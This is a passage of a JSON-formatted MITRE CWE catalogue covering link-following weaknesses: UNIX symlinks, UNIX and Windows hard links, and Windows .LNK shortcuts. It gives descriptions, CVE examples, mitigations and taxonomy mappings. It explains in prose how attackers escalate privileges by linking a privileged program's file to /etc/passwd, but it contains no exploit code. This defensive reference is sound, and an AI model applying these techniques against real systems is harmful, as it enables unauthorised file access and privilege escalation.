files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0517"},{"Reference":"CVE-2004-0689","Description":"Window manager does not properly handle when certain symbolic links point to \\"stale\\" locations, which could allow local users to create or truncate arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0689"},{"Reference":"CVE-2005-1879","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1879"},{"Reference":"CVE-2005-1880","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1880"},{"Reference":"CVE-2005-1916","Description":"Symlink in Python program","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1916"},{"Reference":"CVE-2000-0972","Description":"Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0972"},{"Reference":"CVE-2005-0824","Description":"Signal causes a dump that follows symlinks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0824"},{"Reference":"CVE-2001-1494","Description":"Hard link attack, file overwrite; interesting because program checks against soft links","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1494"},{"Reference":"CVE-2002-0793","Description":"Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793"},{"Reference":"CVE-2003-0578","Description":"Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0578"},{"Reference":"CVE-1999-0783","Description":"Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0783"},{"Reference":"CVE-2004-1603","Description":"Web hosting manager follows hard links, which allows local users to read or modify arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1603"},{"Reference":"CVE-2004-1901","Description":"Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1901"},{"Reference":"CVE-2005-1111","Description":"Hard link race condition","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1111"},{"Reference":"CVE-2000-0342","Description":"Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka \\"Stealth Attachment.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342"},{"Reference":"CVE-2001-1042","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1042"},{"Reference":"CVE-2001-1043","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1043"},{"Reference":"CVE-2005-0587","Description":"Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0587"},{"Reference":"CVE-2001-1386","Description":"\\".LNK.\\" - .LNK with trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"},{"Reference":"CVE-2003-1233","Description":"Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1233"},{"Reference":"CVE-2002-0725","Description":"File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725"},{"Reference":"CVE-2003-0844","Description":"Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0844"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Link Following"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO02-C","Entry_Name":"Canonicalize path names originating from untrusted sources"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS01-C","Entry_Name":"Check for the existence of links when dealing with files"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"FIO01-PL","Entry_Name":"Do not operate on files that can be modified by untrusted users","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"132"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"35"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Symbolic Link Attacks&#34;, Page 518"}}},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":["Link following vulnerabilities are Multi-factor Vulnerabilities (MFV). They are the combination of multiple elements: file or directory permissions, filename predictability, race conditions, and in some cases, a design limitation in which there is no mechanism for performing atomic file creation operations.","Some potential factors are race conditions, permissions, and predictability."]},{"#text":"UNIX hard links, and Windows hard/soft links are under-studied and under-reported.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Causal_Nature, Common_Consequences, Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Link Following","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Links Before File Access (aka \'Link Following\')","attr":{"@_Date":"2009-05-27"}}]}},"61":{"attr":{"@_ID":"61","@_Name":"UNIX Symbolic Link (Symlink) Following","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"A software system that allows UNIX symbolic links (symlink) as part of paths whether in internal code or through user input can allow an attacker to spoof the symbolic link and traverse the file system to unintended locations or access arbitrary files. The symbolic link can permit an attacker to read/write/corrupt a file that they originally did not have permissions to access.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"362","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"340","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"386","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"732","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Symlink following"},{"Term":"symlink vulnerability"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"These are typically reported for temporary files or privileged programs."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Symbolic link attacks often occur when a program creates a tmp directory that stores files/links. Access to the directory should be restricted to the program as to prevent attackers from manipulating the files."},{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1386","Description":"Some versions of Perl follows symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1386"},{"Reference":"CVE-2000-1178","Description":"Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1178"},{"Reference":"CVE-2004-0217","Description":"Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0217"},{"Reference":"CVE-2003-0517","Description":"Symlink attack allows local users to overwrite files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0517"},{"Reference":"CVE-2004-0689","Description":"Possible interesting example","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0689"},{"Reference":"CVE-2005-1879","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1879"},{"Reference":"CVE-2005-1880","Description":"Second-order symlink vulnerabilities","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1880"},{"Reference":"CVE-2005-1916","Description":"Symlink in Python program","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1916"},{"Reference":"CVE-2000-0972","Description":"Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0972"},{"Reference":"CVE-2005-0824","Description":"Signal causes a dump that follows symlinks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0824"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNIX symbolic link following"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"27"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-493"}},{"attr":{"@_External_Reference_ID":"REF-494"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Symbolic Link Attacks&#34;, Page 518"}}]},"Notes":{"Note":{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Symlink vulnerabilities are regularly found in C and shell programs, but all programming languages can have this problem. Even shell programs are probably under-reported.","\\"Second-order symlink vulnerabilities\\" may exist in programs that invoke other programs that follow symlinks. They are rarely reported but are likely to be fairly common when process invocation is used. Reference: [Christey2005]"]}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"62":{"attr":{"@_ID":"62","@_Name":"UNIX Hard Link","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently account for when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. /etc/passwd). When the process opens the file, the attacker can assume the privileges of that process.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1494","Description":"Hard link attack, file overwrite; interesting because program checks against soft links","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1494"},{"Reference":"CVE-2002-0793","Description":"Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793"},{"Reference":"CVE-2003-0578","Description":"Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0578"},{"Reference":"CVE-1999-0783","Description":"Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0783"},{"Reference":"CVE-2004-1603","Description":"Web hosting manager follows hard links, which allows local users to read or modify arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1603"},{"Reference":"CVE-2004-1901","Description":"Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1901"},{"Reference":"CVE-2005-0342","Description":"The Finder in Mac OS X and earlier allows local users to overwrite arbitrary files and gain privileges by creating a hard link from the .DS_Store file to an arbitrary file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0342"},{"Reference":"CVE-2005-1111","Description":"Hard link race condition","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1111"},{"Reference":"BUGTRAQ:20030203 ASA-0001","Description":"OpenBSD chpass/chfn/chsh file content leak","Link":"http://www.securityfocus.com/archive/1/309962"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNIX hard link"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Hard Links&#34;, Page 518"}}},"Notes":{"Note":{"#text":"Under-studied. It is likely that programs that check for symbolic links could be vulnerable to hard links.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"64":{"attr":{"@_ID":"64","@_Name":"Windows Shortcut Following (.LNK)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently handle when the file is a Windows shortcut (.LNK) whose target is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"The shortcut (file with the .lnk extension) can permit an attacker to read/write a file that they originally did not have permissions to access.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Windows symbolic link following"},{"Term":"symlink"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0342","Description":"Mail client allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka \\"Stealth Attachment.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0342"},{"Reference":"CVE-2001-1042","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1042"},{"Reference":"CVE-2001-1043","Description":"FTP server allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1043"},{"Reference":"CVE-2005-0587","Description":"Browser allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0587"},{"Reference":"CVE-2001-1386","Description":"\\".LNK.\\" - .LNK with trailing dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1386"},{"Reference":"CVE-2003-1233","Description":"Rootkits can bypass file access restrictions to Windows kernel directories using NtCreateSymbolicLinkObject function to create symbolic link","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1233"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows Shortcut Following (.LNK)"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"Notes":{"Note":{"#text":"Under-studied. Windows .LNK files are more \\"portable\\" than Unix symlinks and have been used in remote exploits. Some Windows API\'s will access LNK\'s as if they are regular files, so one would expect that they would be reported more frequently.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"65":{"attr":{"@_ID":"65","@_Name":"Windows Hard Link","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files.","Extended_Description":"Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. AUTOEXEC.BAT). When the process opens the file, the attacker can assume the privileges of that process, or prevent the program from accurately processing data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"59","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0725","Description":"File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725"},{"Reference":"CVE-2003-0844","Description":"Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0844"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows hard link"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP18","Entry_Name":"Link in resource name resolution"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;Links&#34;, Page 676"}}},"Notes":{"Note":{"#text":"Under-studied","attr":{"@_Type":"Research 